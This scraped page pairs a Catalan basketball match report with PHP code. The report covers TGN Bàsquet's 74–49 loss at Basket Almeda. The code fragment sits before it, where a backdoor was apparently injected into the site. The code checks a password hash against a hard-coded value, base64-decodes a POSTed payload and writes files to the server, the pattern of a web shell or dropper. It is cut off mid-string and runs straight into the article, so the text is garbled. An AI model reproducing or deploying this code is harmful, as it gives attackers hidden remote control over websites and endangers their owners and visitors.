function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Derrota contra l'Almeda -

Derrota contra l’Almeda

Updated: març 29, 2023

Partit molt competit el que va disputar el TGN Bàsquet a la pista de l’Almeda. El partit va començar molt igualat. On el TGN a base de defensa va aconseguir competir contra l’altura de l’Almeda. Tot i això, en el segon quart l’Almeda a base de triples va aconseguir marxar en el marcador. En el tercer quart el TGN va aconseguir apropar-se gràcies a uns grans minuts de joc. Però en l’últim quart l’Almeda va sentenciar.

BASKET ALMEDA NEGRE: 74 – TGN BÀSQUET 10: 49

PARCIALS: 14-13, 28-10, 12-17, 20-9

BASKET ALMEDA NEGRE: Merce (6), Llao (10), Katir (12), Gracia (-) i Bercero (2)—cinc inicial—Ibañez (5), Thienemann (6), Sanchez (8), Fernandez (3), Julian (11) i Joval (11). LES XIFRES DEL PARTIT: 7/27 tirs lliures | 21 faltes

TGN BÀSQUET 10A: Parera (2), Porta (4), Seoane (18), Dominguez (3) i Salmeron (4)—cinc inicial— Ramon (-), Bueso (2) i Valls (12). LES XIFRES DEL PARTIT: 8/15 tirs lliures | 23 faltes